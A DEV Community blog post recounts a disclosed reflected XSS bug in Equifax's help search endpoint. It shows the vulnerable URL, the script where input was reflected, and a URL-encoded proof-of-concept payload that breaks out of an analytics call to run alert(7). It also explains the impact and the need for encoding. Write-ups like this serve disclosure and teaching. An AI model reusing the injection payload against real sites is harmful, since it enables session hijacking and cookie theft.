DEV Community

Cover image for Reflected XSS in Equifax Search Endpoint
Advik Kant
Advik Kant

Posted on

Reflected XSS in Equifax Search Endpoint

In December 2022, a security researcher reported a reflected cross-site scripting (XSS) vulnerability affecting the search functionality on the Equifax website. The issue was submitted through the company’s vulnerability disclosure program on HackerOne.

Vulnerability Description

The vulnerable endpoint was:

https://www.equifax.com/personal/help/search?search=<input>
Enter fullscreen mode Exit fullscreen mode

When a user entered a search term, the application reflected that value directly into a JavaScript function on the returned page. For example, the word broook appeared in the following script block:

<script type="text/javascript">
  window.onload = function(e){
    Analytics.trackEvent('emptySearch',{internalSearchTerm: "broook" , numOfSearchResultsReturned: 0});
  }
</script>
Enter fullscreen mode Exit fullscreen mode

Because the search parameter was not properly sanitized, an attacker could inject arbitrary JavaScript code.

Proof of Concept

The researcher supplied a payload that modified the parameters of the Analytics.trackEvent function:

%22%20%2C%20internalSearchTerm%3A%20%5B7%5D.map%28alert%29%20%2C%20numOfSearchResultsReturned%3A%20%22b
Enter fullscreen mode Exit fullscreen mode

When decoded, this payload injected an array mapping function that executed alert(7). The final vulnerable script looked like this:

<script type="text/javascript">
  window.onload = function(e){
    Analytics.trackEvent('SEARCHRETURNED',{internalSearchTerm: "" , internalSearchTerm: [7].map(alert) , numOfSearchResultsReturned: "b" , numOfSearchResultsReturned: 167});
  }
</script>
Enter fullscreen mode Exit fullscreen mode

This confirmed that the input was being executed as JavaScript in the browser.

Impact

A successful exploit would allow an attacker to execute arbitrary JavaScript in the context of a victim’s browser session. This could lead to theft of cookies, session hijacking, or other malicious actions depending on the attacker’s goals.

Conclusion

This case highlights the risks of directly embedding user-controlled input into JavaScript code without proper sanitization or encoding. Reflected XSS vulnerabilities are still common and can have serious consequences when exploited on high-profile sites. Proper input handling and output encoding remain essential defenses.


Top comments (0)